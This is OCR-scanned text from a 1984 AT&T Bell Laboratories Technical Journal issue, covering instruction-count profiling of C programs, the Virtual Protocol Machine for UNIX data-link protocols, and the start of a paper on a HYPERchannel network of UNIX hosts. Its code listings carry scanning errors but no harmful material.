(common* arg) ( /* assume that arg is also an apple */ union uu { int i ; char* p; uu(int ii) uu(char* pp) 140 TECHNICAL JOURNAL, OCTOBER 1984 int k = (( apple* ) arg ) ->key; return (key==k) ? 0 : (key v [ j] ) j = i; ) return ( j ) ; ) The user gets an executable program by typing lcomp max.c. After executing the program, the user types lprint, and gets the following output (the italic line numbers are not part of the output). 1. 1 #define N 100000 2. 1 int x [N] ; 3 . 1 4 . 1 main( ) 5. 1 { int i ; 6. 1 srand ( getpid ( ) ) ; 7. 1 for(i = 0; i v [ j ] ) 18 . 10 j = i ; 19 . 99999 } 20. 1 return ( j ) ; 21. 0 1 INSTRUCTION COUNTING 237 The 10 new maxima are approximately what the theory predicts. The counts of 1 on the declarations and blank lines come from the next executable basic block (see Section 10.1). Thus, a blank line after line 17 would have a count of 99,999 in the output. IX. PRINTING THE RESULTS The program, lprint, prints counts. It produces output broken down by instructions, source line, function, or file. At its most verbose it will print each assembly language instruction with the number of times it was executed. By default it prints each line of the source with the number of times it was executed, as above. Because the correspond- ence between basic blocks, which is what are being counted, and source lines for compiled languages is inexact, these line counts need to be viewed with a modicum of understanding (see below). For intermediate amounts of detail, lprint summarizes by functions, or prints each line with the number of machine instructions executed. Later there are some examples of line counts. Here is an example of summary by function: 16779455ie 524353calls 38 i Oine _naput 9921 1 68 7 ie 524353calls 8 0 i 1 7ine _naget Oie Ocalls 3 1 i 3 1 ine __naf ree 368 6ie 67calls 60i 2ine _naupdat 9 1 478 ie 1 434calls 7 3i 3ine __naread 4 7 7 9 ie 8 1 calls 69i 1 Oine _nawr ite 420ie 1 4calls 3 1 i 1 ine _natrunc 30344908 ie 523189calls 6 1 i 1 ine __nastat 457595ie 1 333calls 368 i 8 Oine _nanami 7257 1 404ie 1 576004calls 1 0 7 i 1 1 ine _send The first column shows how many instructions were executed in that function. The second column gives the number of times the function was executed. The third gives the number of instructions in the compiled function, the fourth gives the number of those that were never executed, and the last column is the name of the function. The same data summarized by file are 219465412 le 9181 156ine 6035248 7bbe 2 5 5bb 59bbne neta.c The new information is in columns four, five, and six. These are the number of executions of basic blocks, the number of basic blocks in the file, and the number of those never entered during execution, respectively. 238 TECHNICAL JOURNAL, OCTOBER 1984 X. USING THE OUTPUT 10. 1. But what does it really mean ? Here is an example. The italic numbers are not part of the program’s output. The code is a piece of the operating system, and the data are real. 1 . 2204448 loop: 2 . 2204448 slot = INOHASH(dev, ino, fstyp) ; 3 . 2204448 ip = 8 inode [ i nohash [slot] ] ; 4 . 4378850 while (ip ! = 8inode[-1] ){ 5 . 2919642 if ( ino ==ip->i_number8 8dev = = ip->i_dev 6 . 2919642 8 8 fstyp = = ip-> i_f s typ ) { 7 . 745240 if ( (ip-> i_f lag&ILOCK) ! = 0){ 8 . 513 ip- > i_f lag | = IWANT ; 9 . 513 sleep( (caddr_t ) ip,PINOD) ; 10. 513 goto loop; 11 . 744727 ) 12. 744727 if ( ( ip-> i_f lagSIMOUNT) ! = 0){ 13. 418411 f or (mp = Smount [ 0 ] ; mp< Smount [NMOUNT] ; mp + +) 14. 4509270 if (mp- >m_inodp = = ip)( 15. 418411 dev = mp- >im_dev ; 16. 418411 ino = ROOTING; 17. 418411 fstyp = mp- >nu_f styp; 18. 418411 goto loop; 19. 4090859 } 20. 4090859 panic ( "no imt " ) ; 21 . 326316 i 22. 326316 ip- > i_count + +; 23. 326316 ip-> i_f lag | = I LOCK; 24. 326316 return ( ip ) ; 25. 2174402 s Note that there are some peculiarities in the output. This is the case for the for statement at line 13, where the first basic block, the initialization, is executed 418,411 times, while the test is executed at least 4,509,270 times, as can be seen from the next line. Also, the C compiler (at least the one used for the example) has a slightly inac- curate count of line numbers, as we can see from the large numbers on statement 20, which actually was never executed. The problem here is that the C compiler did not recognize the end of the loop until it got to that line, so the loop increment code was associated with that line. Finally, the large count on line 25 is from the first line not shown, and represents the false branch of the test at line 5. INSTRUCTION COUNTING 239 The problem with the compiler is that there is no exact correspond- ence between basic blocks and statements in C (or Fortran or Pascal). While this is regrettable, the data are not randomly weird, but system- atically weird, and thus are usually interpreted unambiguously. Adding curly braces frequently helps with compound statements. Also, the profiler’s idea of lines is the same as the debugger’s idea, so it would appear to the user, for instance, that the line after the loop is being executed each time the debugger single steps through the loop. This part of the kernel is profiled on purpose, not just for this paper. The loop at line 13 searches a linked list, and the question is whether the ordering of the items in the list should be changed, or whether some other data structure should be used. Since the list was searched 418,411 times using 4,509,270 comparisons, and since I know that the list is usually about 16 items long, it appears that some rearranging might make a slight difference. As a side effect of the profiling, note that of the 745,240 times the test at line 7 succeeded, 513 times the resource found was locked. 10.2 . Bottlenecks Time profiling determines which routines are taking lots of time. Then count profiling, by highlighting the busy parts, gives information that explains why the routines are taking so much time. Reference 4 gives examples in which count profiling led to a speedup by factors of 2 to 4. 10.3. Testing The next example is the body of a routine to find the square root of the number a modulo a prime p. It was run several times on random data in the hope that all the code would be covered. 1. 8 extern short primetab [] ; 2. 8 modsqrt ( a , p ) 3 . 8 ( short *x ; 4 . 8 int i, j , s, t, e, u; 5 . 8 a % = p ; 6. 8 i f ( a < 0 ) 7. 0 a + = p ; 8. 8 if (a = = 0) 9. 0 return ( 0 ) ; 10. 8 if (p % 4 = = 3) 11 . 5 return (mpow( a , (p-M)/4,p)); 12 . 3 u = p - 1 ; 13 . 3 f or ( e = 0 ; ( uS 1 ) = = 0 ; e + + ) 14 . 10 u»=1; 15 . 3 s = mpow (a, u, p ) ; 16 . 3 if (s = = 1 ) 240 TECHNICAL JOURNAL, OCTOBER 1984 17. 0 return (mpow( a, ( u + 1 ) / 2 , p ) ) ; 18. 3 f or ( x = prime tab + 1 ; legendre ( *x , p ) ! 19. 5 x + + ) ; 20. 3 for( j = 0; j < e ; j ++) 21. 5 if (s = = p -1 ) 22. 3 break ; 23. 2 else 24. 2 s = ( s*s ) %p; 25. 3 s = mpow ( *x , u , p ) ; 26. 3 for ( i = 0 ; i= 8) Z = Z - 8;} #def ine START_T1 { tstatus = T1FLAG; tl = T1 ? } /* * Transmit a data frame if one is available. */ xmtdata ( ) { /* * If this is not a retry, get a new frame if available. */ if (VS == unopened) { if (getxfrm(VS) ) return (FALSE) ; INCMOD8 (unopened) ; > /* * Set up address and control bytes. */ con = (VS&07) <<1; con |= (VR&07 ) <<5 ; ac[l] = con? ac[0] = faraddr; /* * Start Tl timer if not currently running. */ if (! (tstatus & TlFLAG) ) ( START_T1 ? } /* * Set up control information and transmit frame. */ setctl (ac , 2 ) ; xmtfrm (VS) ; INCMOD8 (VS) ; return (TRUE) ; Fig. 3 — Example use of bit-oriented primitives. Several primitives are available for use with all three classes of protocols. Among these are facilities for receiving commands from and sending reports to a UNIX system driver or user process, generating trace event records, and starting and resetting software timers. For a detailed description of the VPM primitives, see the entry for vpmc (1M) in the UNIX System Administrator’s Manual. 3 III. COMMON SYNCHRONOUS INTERFACE The UNIX operating systems’s Common Synchronous Interface (CSI) is a device -independent interface between a level-3 protocol executing as a part of the system and a level-2 protocol executing in a PCD. CSI allows level-3 protocol drivers to be independent of the host computers on which they run and the PCDs used to implement their level-2 protocol. Figure 1 illustrates the interaction of the level-3 protocol driver and the level-2 protocol through CSI. The interface consists of a set of functions used by level 3 and a set of reports that are generated by level 2. The two classes of functions are service functions and command functions. Service functions are used for buffer administration. Command functions are used to set up and communicate with the level-2 protocol. The level-3 driver receives VIRTUAL PROTOCOL MACHINE 279 reports from the level-2 protocol and the PCD device driver via an interrupt routine. The more important functions and reports are described below. Some nonessential functions and reports have been omitted for clarity. Service functions provide standard buffer queue management for level-3 protocol drivers. A standard CSI buffer structure is used to maintain buffers, allowing machine-independent buffering. Each buffer structure has buffer descriptors associated with it for maintain- ing buffer addresses, sizes, and any machine-dependent information. The service functions include: 1. csiaiioc — Allocate a buffer area for use by the level-3 driver. This function is typically called once during initialization to allocate buffer space for use by level 3. 2. csif ree — Free the buffer area allocated for level 3. 3. csibget — Get a buffer descriptor and a buffer from the buffer area. This function is used by the level-3 protocol driver to obtain data buffers as needed. 4. csibrtn — Return a buffer descriptor and its associated buffer. This function is used when a buffer will no longer be needed by the level-3 protocol driver. 5. csicopy — Copy buffers to or from user space. This function provides a machine-independent way to copy data between system and user space. Command functions are used to manage the communications link and communicate with the level-2 protocol script. The command functions include: 1 . cs iattach — Make a logical connection between a protocol driver and a synchronous line. This function is called before starting the level-2 protocol. 2. csidetach — Disconnect a protocol driver from a synchronous line. 3. cs is tart — Start the level-2 protocol. After a logical connection has been made, this function is used to start operation of the line (e.g., when a user requests a service). 4. cs i s t op — Stop the level-2 protocol. This function is used to halt operation of the line. 5. csixmtq — Queue a transmit (full) buffer for level 2. This func- tion is typically used by the level-3 protocol driver to transfer data on the line. 6. csiemptq — Queue a receive (empty) buffer for level 2. This function is used to provide level 2 with buffers for incoming data. 7. c s i s cmd — Send a command to the level-2 protocol. This function is typically used to communicate control information to level 2. Reports are passed to a level-3 driver routine that is indicated when 280 TECHNICAL JOURNAL, OCTOBER 1984 the logical connection is established. The level-3 driver receives two types of reports. Reports received as a result of a function call are referred to as solicited reports. Reports that are not issued as a result of a function call are referred to as unsolicited reports. Solicited reports indicate the disposition of the corresponding function. The solicited reports include: 1. c i start — Issued in response to a start command from the csistart routine. The report indicates if the line was started or if any errors occurred. 2. csistop — Issued in response to a stop command from the csistop routine. The report indicates that the level-2 protocol has been halted. 3. csirxbuf — Issued when the level-2 protocol program returns a transmit buffer to the level-3 protocol driver. This report typically indicates that the data have been transmitted. 4. csirrbuf — Issued when the level-2 protocol program returns a receive buffer to the level-3 protocol driver. The report typically indicates that data have been received. 5. csicmdack — Issued when the level-2 protocol receives a com- mand from the csicmd routine. Unsolicited reports indicate random events from the level-2 protocol script. The unsolicited reports include: 1. cs iterm — Occurs when the protocol terminates abnormally. The report contains an indication of the reason for termination. 2. csisrpt — Occurs when the level-2 protocol passes information to the protocol driver. IV. TRACE DRIVER The trace driver provides a means by which a user program can receive trace information generated by a VPM protocol driver and script to aid in debugging. It can also be used to debug other drivers or operating-system code that is not related to a VPM protocol driver or script. This driver can be configured to have a number of minor devices. Each trace-driver minor device provides a means by which a user program can read data that are generated by functions within the operating system. These data are recorded by issuing calls to the trsave function. Each call to trsave generates a unit of data known as an event record , which consists of a channel number, a count, and count bytes of data. The channel number can be used to multiplex up to 16 data streams on each minor device. Each channel can be enabled or disabled by an iocti system call. Event records that are generated for a minor device that is not currently open, or for a channel that is not currently enabled, are VIRTUAL PROTOCOL MACHINE 281 discarded. This allows a user program to control the activation and deactivation of tracing. Minor device 0 of the trace driver is used by the VPM transparent driver and CSI to record a variety of debugging information generated within these modules and also to record the data generated by trace primitives in the protocol script. Two commands, vpmsave and vpmfmt, are available for reading and formatting data passed via the minor devices of the trace driver. Trace information can be displayed in real time if appropriate. V. IMPLEMENTATIONS 5 . 1 DEC computers The implementation of VPM on DEC computers (VAX-11, PDP- 11) uses a programmable communications device known as a KMC11- B. The KMCll-B is a small (12K bytes), fast (200-ns instruction time), single-board computer that attaches to the UNIBUS* of a VAX* or PDP* computer. The KMCll-B can become bus master to perform DMA transfers to and from the host computer’s main memory. The KMCll-B can be fitted with any of several types of communications interfaces. One type interfaces a single synchronous line at speeds of up to 56 kb/s. Another type interfaces up to eight synchronous lines at speeds up to 19.2 kb/s. The actual speed at which the interfaces can be used depends on the protocol. Because of the small memory size of the KMCll-B, the VPM compiler for the DEC computers translates a protocol script into an intermediate language that is interpreted by a control program in the KMCll-B. This intermediate language consists of binary instructions for a hypothetical computer with a simple one-address instruction set. The VPM primitives are implemented as single instructions for this virtual machine. The VPM compiler for the DEC machines does not support the full C language. While essentially all of the control structures and opera- tors of C are admitted, there is only one data type: unsigned characters. All variables are global. Besides interpreting the compiled protocol script, the VPM control program is responsible for: (1) communicating with the host computer (via eight bytes of shared memory) in order to receive commands from the host and send reports to the host, (2) servicing the synchronous line interface(s), (3) monitoring modem status, (4) maintaining a series of software timers, and (5) maintaining queues of transmit buffers and receive buffers. The VPM control program for the eight-line interface uses an * Trademark of Digital Equipment Corporation. 282 TECHNICAL JOURNAL, OCTOBER 1984 efficient real-time scheduling algorithm to meet the needs of commu- nications processing: once the virtual process for a given line gets control of the processor, that process is allowed to run until it blocks. A process can block voluntarily by executing a pause primitive. Once a process blocks, it is not rescheduled until the occurrence of some event that could change the state of the protocol for that line. Such events are: 1. Arrival of an incoming character or completion of an outgoing character for a character-oriented protocol; completion of an incoming or outgoing frame for a bit-oriented protocol. 2. Notification by the host of the availability of a transmit buffer or a receive buffer or a command from the host. 3. Expiration of a timer previously started by the process. As processes become unblocked, they are placed on the end of a ready-to-run queue and scheduled in a First-In First-Out (FIFO) manner. Because of the limited memory space in the KMCll-B, the imple- mentation for the eight-line interface requires that all eight lines share a single copy of the compiled protocol script; this implies that all eight lines must be running the same level-2 protocol. Each line has a 256- byte data area that is used to hold the local variables for that line and as a save area on a context switch. Memory protection is provided by the interpreter. 5.2 AT&T 3B20 computer The 3B20 is a 32 -bit general-purpose minicomputer manufactured by AT&T. It supports three different PCDs. One PCD supports character-oriented protocols using the VPM primitives; the other two PCDs support X.25 LAPB and are not user-programmable but are controlled by CSI. The remainder of this section describes the char- acter-oriented PCD. The 3B20 implementation of VPM differs from that on the DEC machines. Protocol programs are not interpreted, but are compiled into machine language and executed directly. The PCD consists of a microcomputer system with four RS-232/449 ports. One of the ports also supports a CCITT V.35 interface for communication at speeds up to 56K bits per second. The major software components are a full C language compilation system, a library of VPM primitives, a small operating system to oversee execution of protocol programs, and a UNIX system driver to interface to CSI. A C compiler-based VPM implementation was chosen because C language support existed for the hardware before the VPM was imple- mented, and the PCD has ample memory. Supporting the full C VIRTUAL PROTOCOL MACHINE 283 language allows protocol programs to be as sophisticated as the appli- cation requires and real-time constraints permit. Protocol programs run under the control of a small VPM operating system. It supports five independent processes: four protocol programs and one control program. All processes and the operating system reside in the same address space. The memory and address space not used by the system is partitioned statically into four pieces, one partition for each port. There is no hardware memory protection and processes are expected to be cooperative. VPM primitives such as rev and xmt are implemented using a lower-level set of primitives that are defined by the operating system. The intent was to provide a system that could be extended beyond VPM if desired. These subprimitives provided facilities for scheduling, transferring messages to and from the driver, doing DMA to the host memory, and copying data and accessing peripheral device registers. Processes are scheduled in a round-robin fashion using a one-tenth of a second time slice. A process will run until it either gives up the CPU, or is preempted after running for one-tenth of a second. A process is always runnable unless it has been stopped or exited. The pause primitive gives up the CPU until all the other processes have had a chance to run. Rev is implemented as: while (receive queue is empty) { check modem status pause(); } return next character from the queue Characters are placed into the receive queue by the operating system through interrupts. The xmt primitive is similar. It puts characters into a queue, and the characters are actually transmitted at interrupt level. The VPM operating system is brought into service by down loading it through a standard “device on-line” command. After being down loaded, the control process runs and waits for work to do. The control process has three functions: (1) down load, stop, and start protocol programs; (2) respond to audits or “sanity checks” from the driver; and (3) respond to “set Universal Synchronous/ Asynchronous Re- ceiver/Transmitter (USART) options” commands from the driver. A protocol program is created in two steps. First, the C source is compiled and linked with the VPM primitive library, with loader relocation information left intact. The output of this step is a generic object program that can be run on any port of any PCD. The next step is to relocate the program to the memory partition that is 284 TECHNICAL JOURNAL, OCTOBER 1984 appropriate for the particular port being used, and then down load it into the PCD. 5.3 AT&T 3B5 computer The AT&T 3B5 is also a 32-bit general-purpose minicomputer. It is somewhat smaller than its predecessor, the 3B20, but it is software compatible with it. VPM forms the software structure used to support most data-linking capabilities on the 3B5. The 3B5 VPM implementation is based on that for the 3B20, with C programs compiled into machine language and executed directly. In fact, the CSI, trace driver, protocol scripts, transparent driver, and many utility programs were simply ported from the 3B20 and recom- piled. Because the PCD hardware is much different, the VPM oper- ating system was redesigned, but it maintains the same interfaces as that on the 3B20. Thus, protocols that run on the 3B20 will, in general, run on the 3B5 with just a recompilation. The PCD hardware consists of an intelligent peripheral controller, which runs the scripts, plus a collection of boards containing line interfaces for the various protocol classes. Several of these boards may be serviced simultaneously by the controller, with many different protocols running simultaneously. The major software components have already been described in connection with the 3B20. On the 3B5, however, memory availability is the only limit on the number of processes supported by the VPM operating system, and a limited degree of protection between protocol programs exists. Memory allocation is dynamic, done when the scripts are loaded into the peripheral controller or by request of the running script via a primitive. Multiple instances of the same protocol may share the same copy of their program, using separate stacks and data areas. The controller operating system and the primitives reside in Eras- able Programmable Read-Only Memory (EPROM), but much of the code may be selectively replaced by down loading new versions when the system is initialized. Scheduling, event handling, and the rest of the program creation and down-load process are as described for the 3B20. In addition to the standard trace facility, routines exist that allow a script to output directly to an optional debugging port on the PCD rather than back to the host. While VPM was originally intended to support only synchronous interfaces, on the 3B5 computer it has been extended to include asynchronous communication as well. This involved, besides providing the necessary hardware, the addition of the small collection of asyn- chronous primitives that were outlined in a previous section. These VIRTUAL PROTOCOL MACHINE 285 primitives are used to support a standard UNIX system terminal interface using either RS-232C or Teletype Standard Serial Interface. VI. APPLICATIONS VPM has been used by UNIX system developers and customers to implement a variety of protocols supporting various networking ap- plications. Some of the more widely used protocols and applications have been developed for official UNIX system distribution; these are briefly described below. Many other protocols and applications have been developed by our customers; some of these are listed in the miscellaneous section below. 6. 1 Remote job entry The Remote Job Entry (RJE) system connects UNIX systems to IBM 360/370 computers by simulating a remote work station. The basic facility provided by RJE is the remote execution of jobs created on the UNIX system. The IBM and UNIX systems communicate using a character- oriented protocol known as Houston Automatic Spooling Priority (HASP) multileaving. Three processes are used to implement the multileaving protocol: a PCD program and two user processes. The protocol program implements level 2. It performs header consistency and CRC-16 checks on received blocks, and it generates the CRC-16 data for transmitted blocks. It also performs Extended Binary-Coded Decimal Interchange Code (EBCDIC) to American National Standard Code Information Interchange (ASCII) translation on print data. The two user processes multiplex and demultiplex multiple job streams to and from a single data link. 6.2 Synchronous terminals Two applications of VPM support IBM 3277-compatible display station (terminal) clusters. The Synchronous Terminal (ST) system allows terminal clusters to be connected to a UNIX system host, while the 3270 Emulation (EM) system allows applications to connect to hosts that support terminal clusters. Both of these packages have been implemented using VPM CSI. Synchronous terminals communicate with the host through a single cluster controller using the BISYNC line protocol. Message traffic is regulated by using a polling and selecting scheme. The host polls the cluster for available input data and selects specific terminals for output. The ST system software consists of a level-2 protocol script and a level-3 driver. The script implements the polling and selecting func- tions of the line protocol. The driver provides two different user 286 TECHNICAL JOURNAL, OCTOBER 1984 interfaces: (1) In application mode, the controlling user process com- pletely manages the display terminal screen. (2) In line mode, the driver provides enough basic screen management to make the device usable as a login terminal for most of the standard UNIX system commands. The EM system software consists of a level-2 protocol script and a level-3 driver interface. The script implements the BISYNC line protocol of a display station controller. The driver interface is in two parts: a controller interface driver that handles link administration and controller functions, and a terminal interface driver that supplies the user-level interface. 6.3 X.25 interface X.25 is an international standard layered data communications protocol that allows several virtual channels to be multiplexed over a single physical link. Each channel has its own flow control and error control. The current version of X.25 in the UNIX system consists of three levels. On DEC computers, level 2 is implemented as a VPM protocol script. On AT&T computers, level 2 is implemented on PCDs that do not support VPM. Level 3 of X.25 is implemented using CSI, which makes it portable across all UNIX system hosts that support CSI. 6.4 5620 DMD support The Teletype 5620 Dot Mapped Display (DMD) terminal is an intelligent peripheral containing a keyboard and display, an electronic “mouse” for cursor pointing, and an RS-232 output port for a dot matrix printer. The driver that supports it utilizes VPM. Through application code, options in the VPM-based driver, and software running on the DMD, multiple windows are supported on the terminal display. This driver is based on the asynchronous terminal package with the addition of multiple communications channels and knowledge of the communications protocol used by the code running on the DMD. This involves dynamically replacing the line discipline used in standard terminal mode with one that multiplexes and demultiplexes packets intended for a virtual terminal, and it ensures that all packets are properly ordered. Flow control is provided to ensure that packets are not sent more quickly than they can be received. 6.5 Miscellaneous Some customer-developed applications of VPM include: • LEAP — A package similar to the 3270 emulation package that is used to load-test IBM host applications that use 3270-compatible terminals. VIRTUAL PROTOCOL MACHINE 287 • Bell Administrative Network Communications Systems (BANCS) — A message-switching network for business communications. The internal protocols are based on BISYNC. A UNIX system interface to control the BANCS switches has been developed using VPM. • BLN — An AT&T Bell Laboratories Network that connects hosts from different vendors typically running different operating systems. An interface to BLN for UNIX system hosts was developed using VPM. • WANG — A protocol script was developed to allow UNIX systems to interface to a WANG word processer. VII. CONCLUSION VPM was developed in response to a need to implement several different character-oriented protocols on DEC’s KMCll-B micro- processor. We did not have the resources or the inclination to develop and support assembly-language implementations of these protocols plus an unpredictable number of future requirements. We therefore were led to develop a general-purpose package for implementing level- 2 protocols rather than several different assembly-language implemen- tations of specific protocols. As this effort unfolded, new requirements led us to expand VPM to include bit-stuffing protocols as well. When the UNIX system was ported to new computers with different PCDs, VPM became the means of porting level-2 protocol implementations to the different PCDs involved. Since VPM allowed the representation of a level-2 protocol to be hardware independent, it could be ported to other environments with little or no change. In a few cases, protocol implementations that were developed using VPM have been ported to environments unre- lated to the UNIX system. As VPM was extended to new UNIX system hosts, and higher-level protocols such as X.25 were implemented as UNIX system drivers, it became necessary to provide a means that would ensure the portability of these drivers. This led to the definition of the Common Synchronous Interface (CSI), which provides a device-independent interface be- tween level-2 and level-3 protocols. The clear success of VPM as a UNIX system facility is gratifying to all of us who had a part in developing it. The goal of opening up data communications programming to applications programmers has been met; customers really are writing their own communications applications. The ability to program link-level protocols in a high- level language has been valuable in debugging implementations of complex protocols such as X.25. The ability to port protocol imple- 288 TECHNICAL JOURNAL, OCTOBER 1984 mentations between computers, although not considered in the original goals, has become perhaps the most important feature. VIII. ACKNOWLEDGMENTS In addition to the authors of this article, a large number of people have contributed directly or indirectly to the development of VPM; among them are R. V. Baron, C. A. Bishop, R. J. Butera, T. A. Dolotta, J. A. Dziadosz, R. M. Ermann, R. C. Haight, C. B. Hergenhan, D. E. Jimenez-Puttress, G. W. R. Luderer, G. J. McGrath, B. Nohejl, V. H. Rosenthal, R. M. Sabrio, A. L. Sabsevitz, L. J. Schroeder, D. R. Shuman, B. A. Tague, B. E. Todd, and L. A. Wehr. Finally, the utility of the UNIX system architecture, philosophy, and tools as a basis for the development of VPM is gratefully acknowl- edged. REFERENCES 1. D. W. Davies, D. L. A. Barber, W. L. Price, and C. M. Solomonides, Computer Networks and Their Protocols , New York: Wiley, 1979. 2. B. W. Kernighan and D. M. Ritchie, The C Programming Language , Englewood Cliffs, NJ: Prentice-Hall, 1978. 3. UNIX System Administrator's Manual — Release 5.0, Western Electric, June 1982. AUTHORS Michael J. Fitton, B.S. (Computer Science), 1981, Rutgers University; M.S. (Computer Science), 1983, Stevens Institute of Technology; AT&T Bell Lab- oratories, 1977 — . Mr. Fitton has been involved in software development for the UNIX operating system. His initial work involved the design and imple- mentation of tools for the Programmer’s Workbench version of the UNIX system. He has also worked on data communications software and operating system development. He is currently working on the development of a multi- processor version of the UNIX operating system. Carol J. Harkness, B.A. (Mathematics), 1969, University of Wisconsin; M.S. (Computer Science), 1970, Purdue University; AT&T Bell Laboratories, 1969 — . Ms. Harkness has designed editors, compilers, assemblers, and test tools for a variety of ESS ™ projects. She became involved with microprocessors through debugging tool development, then went on to developing peripheral software and firmware for the AT&T 3B5 computer. She is currently the Supervisor of the Network Design group, developing the AT&T 3B Net local area network for the 3B computer line. Member, ACM, IEEE, Phi Beta Kappa, Phi Kappa Phi, Sigma Epsilon Sigma. Keith A. Kelleman, B.S. (Electrical Engineering), 1979, Lafayette College; M.S. (Computer Science), 1981, Stevens Institute of Technology; AT&T Bell Laboratories, 1979 — . At AT&T Bell Laboratories, Mr. Kelleman has been involved with UNIX operating system development. He is currently working on the development of a demand paged kernel for the UNIX system. His VIRTUAL PROTOCOL MACHINE 289 previous assignments were to develop a UNIX system for the AT&T 3B20 computer and to convert the RJE system to VPM. Paul F. Long, B.S. (Engineering Mathematics), 1960, M.S. (Applied Math- ematics), 1963, North Carolina State University; Bellcomm, Inc., 1965-1972; AT&T Bell Laboratories, 1972 — . Mr. Long has worked on various applications and systems programming projects and supervised similar activities over the last 18 years. In addition to working on VPM, he participated in the UNIX operating system BX.25 implementation as well as other UNIX system networking projects. Member, Tau Beta Pi, Pi Mu Epsilon, Sigma Xi. Carl Mee III, B.S. (Mathematics), 1957, The University of the South; M.A. (Mathematics), 1964, The University of Virginia; U.S. Air Force, 1958-1962; Bellcomm, Inc., 1964-1966, 1968-1972; Informatics, Inc., 1966-1968; AT&T Bell Laboratories, 1972 — . Mr. Mee has worked on a variety of applications and systems programming projects. From 1978 to 1983 he worked on the development of communications facilities and other software for the UNIX operating system. He is currently working on the development of video-based interactive information systems. 290 TECHNICAL JOURNAL, OCTOBER 1984 AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October, 1984 Printed in U.S.A. The UNIX System: A Network of Computers Running the UNIX System ByT. E. FRITZ,* J. E. HEFNER,* and T. M. RALEIGH* (Manuscript received September 1, 1983) This paper discusses experience in designing software to interconnect large numbers of processors that are based on the UNIX ™ operating system over a high-speed local area network. The paper discusses portability of the imple- mentation between different processors and operating systems based on the UNIX system, the influence of different schedulers, input/output subsystems, and different speed processors on the implementation and performance of the network. Also discussed are characteristics of network usage, such as traffic patterns, throughput, and response. I. INTRODUCTION This paper documents experience in designing software to intercon- nect large numbers of UNIX operating systems at AT&T Bell Labo- ratories over a high-speed local area network. The networks are used to support large cooperative development environments and general- purpose computer centers. II. BACKGROUND By 1979, the needs of many development projects and computing * AT&T Bell Laboratories. + AT&T Bell Laboratories; present affiliation Bell Communications Research, Inc. Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted with- out payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permis- sion. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor. 291 center environments at AT&T Bell Laboratories had outgrown the confines of a single minicomputer or mainframe. The programming environment provided by the UNIX system had become the preferred development environment on both small and large software develop- ment projects. The preference for a UNIX system environment was so strong that many development functions were migrated from tra- ditional mainframes to minicomputers running the UNIX system. As the size and complexity of each project increased, additional minicom- puters were added to balance the load among users, thereby creating a need for communication between systems. For several years, the dial-up network provided by uucp 1 satisfied the communication needs of many widely separated small development environments; but for large cooperative development environments, the network was over- loaded and the need for higher-speed localized access between proces- sors was apparent. During the same period, implementations of the UNIX system on other processors (IBM 370, AT&T 3B20S, and UNIVAC*) were in progress and it was clear that users wanted to view processors as different-speed functional engines (minicomputer versus mainframe), all with a standard UNIX operating environment and with a common high-speed interconnect. During 1979, a standard UNIX system interface was far from realized since many of the UNIX system implementations were in their infancy and the lessons about portability of software were being uncovered painfully. Research and development of network software for UNIX systems have been emphasized since the UNIX system was first introduced in 1973. The uucp network is familiar to all UNIX system installations and many implementations of small networks using X.25, DDCMP, f time-division multiplexors, and other media have been developed to provide limited batch file transfer capabilities. In parallel with this, much research has gone into interactive networks 2 of UNIX systems. Most of this work was characterized as follows: 1. All processors were identical (single vendor). 2. There was no standard UNIX system environment. The environ- ment (operating system and C compiler) at each site was under the control of local researchers and developers and was frequently custom tailored. 3. Because of the availabilty and investment in 16-bit minicompu- ters, the network software was constrained to run in a limited address space (in particular, the address space of a PDP-ll/70, f 64K bytes of text, and 64K bytes of data). This limitation existed for both the user- * Trademark of Sperry Corporation. + Trademark of Digital Equipment Corporation. 292 TECHNICAL JOURNAL, OCTOBER 1984 level network control programs and within the operating system. It placed constraints on the size and function of network support func- tions for the operating system. Keeping the implementation small and isolated from the kernel of the system was a goal of many of the implementations. The availability of local area networking devices and the emergence of 32-bit minicomputers by 1980 offered the potential for creating a distributed computing environment for the UNIX system. It also provided the impetus for standardizing the operating system inter- faces, commands, and compilers. A transition to a multiple -vendor computing environment was feasible because a standard package of software reduced the cost of developing and maintaining a standard environment on each vendor’s hardware. The development of the UNIX system local area network using the HYPERchannel* network is instructive because not only did the ordinary portability issues of user-level application software (word length, byte-order dependencies, etc.) have to be addressed, but several operating systems that resem- bled the UNIX system were hosts on the network; differences between these implementations affected other aspects of portability. III. A HIGH-SPEED LOCAL AREA NETWORK Development of the 5 ESS™ switching system 3 had created the need for many cooperating minicomputers (3B20S, VAX, + and PDP-11/70 computers) and mainframes (IBM 370) to manage a large software development environment. This project provided the impetus for the development of both the HYPERchannel network and the UNIX system implementation for the IBM 370 processor. The selection of the HYPERchannel network as the interconnect medium was based on the large number of interfaces to processors that existed (IBM, DEC, + Data General, etc.) and the success of some prototyping work done at the Indian Hill computer center for the AT&T Bell Labora- tories network. Ethernet,* Datakit™ virtual circuit switch, X.25, and broadband networks were not commercially available for a wide variety of processors. Constructing the software and shaking out the initial skeleton of the network spanned two and one-half years and involved many developers from several AT&T Bell Laboratories locations. The HYPERchannel network was developed to serve a community in which: 1. The network had to support a range of UNIX system versions and C compilers. * Trademark of Network Systems Corporation. f Trademark of Digital Equipment Corporation. * Trademark of Xerox Corporation. PROCESSOR NETWORK 293 2. The network was required to run on 16- and 32-bit processors with different byte orderings, word lengths, and processing power. 3. The implementation was required to run on other similar oper- ating systems. The input/output (I/O) subsystems for each vendor’s processor had a different architecture and the control sequence for communicating with each network adapter was different. This meant that a major part of the development was designing and synchronizing device drivers and establishing the proper error recovery on each processor. 4. The reliability of the network had to remain high in spite of the fact that processors would randomly join and leave the network (deliberately or unexpectedly). Because of the number of different environments that were involved, several design constraints were enforced on the software. In particular, 1. Since all processors would run in a user environment similar to the UNIX system, a goal was set to produce a single user-level network software package that would run on all implementations. All machine dependencies could not be excluded from the user-level source so conditional compilation of a few user modules was the only vehicle allowed to account for machine dependencies, and its use was discour- aged. 2. The network software and drivers were written in a subset of the C language. Recent additions to the C language such as enumeration data types and block structure were not allowed because the compilers on each different processor had not reached the same level of maturity. 3. New operating system features were excluded from the design. Interprocess communication features (e.g., shared memory, messages, semaphores) could not be taken advantage of since they were not yet implemented on some UNIX systems (e.g., the first version of the UNIX system for IBM System/370) or the implementation was not portable. For example, the architecture of the memory management hardware on PDP-11/70 